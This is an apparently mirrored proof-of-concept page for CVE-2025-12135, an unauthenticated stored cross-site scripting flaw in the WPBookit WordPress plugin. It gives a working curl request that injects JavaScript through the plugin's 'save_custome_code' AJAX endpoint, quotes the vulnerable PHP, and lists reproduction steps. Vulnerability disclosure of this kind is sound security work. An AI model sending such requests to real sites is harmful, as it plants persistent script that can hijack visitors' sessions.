关联漏洞
标题:WordPress plugin WPBookit 跨站脚本漏洞 (CVE-2025-12135)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin WPBookit 1.0.6及之前版本存在跨站脚本漏洞,该漏洞源于缺少能力检查,可能导致存储型跨站脚本攻击。
Description
WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting
介绍
# WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting
The [WPBookit](https://wordpress.org/plugins/wpbookit/) plugin does not validate user permission or sanitize custom CSS/JS code in its `save_custome_code` AJAX endpoint, allowing unauthenticated attackers to inject arbitrary JavaScript that executes on every page load, leading to stored XSS and potential session hijacking.
## TL;DR Exploits
```bash
# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "css_code=/* malicious */&js_code=alert('XSS');"
```
## Details
The vulnerability exists in the `save_custome_code` method of the `WPB_Setting_Controller` class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to inject arbitrary CSS/JS code that gets executed on every page load.
**Vulnerable code** from [`/core/admin/classes/controllers/class.wpb-setting-controller.php:16-25`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/controllers/class.wpb-setting-controller.php#L16):
```php
public function save_custome_code(WP_REST_Request $request){
$css_code= $request->get_param('css_code');
$js_code= $request->get_param('js_code');
update_option( 'wpb_custom_code_data', [ 'css_code' => $css_code, 'js_code' => $js_code ]);
}
```
**Code execution** from [`/core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/shortcodes/class-wpbookit-shortcode-abstract.php#L20):
```php
$wpb_custom_code= get_option( 'wpb_custom_code_data', [ 'css_code' => '', 'js_code' => '' ]);
wp_add_inline_style( 'wpb-custom-code-css', stripslashes($wpb_custom_code['css_code']));
wp_add_inline_script( 'wpb-custom-code-js', stripslashes($wpb_custom_code['js_code']) );
```
**Unauthenticated access** from [`/core/admin/classes/class.wpb-admin-routes-handler.php:15-16`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes-handler.php#L15):
```php
add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
```
**Route configuration** from [`/core/admin/classes/class.wpb-admin-routes.php:118-123`](https://plugins.trac.wordpress.org/browser/wpbookit/trunk/core/admin/classes/class.wpb-admin-routes.php#L118):
```php
'save_custome_code' => [
'method' => 'post',
'action' => 'WPB_Setting_Controller@save_custome_code',
'nonce' => 0,
'module' => 'setting-controller'
],
```
## Manual Reproduction
1. **Identify target** with WPBookit plugin installed
2. **Inject malicious JavaScript**:
```bash
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "css_code=/* malicious */&js_code=alert('XSS');"
```
3. **Verify injection** by visiting any page on the site - the alert will execute
4. **Check persistence** - the malicious code is stored in the database and executes on every page load
文件快照
[4.0K] /data/pocs/cf6af9e8df3fba36840b6b298a86e9637c46c90a
└── [3.1K] README.md
1 directory, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。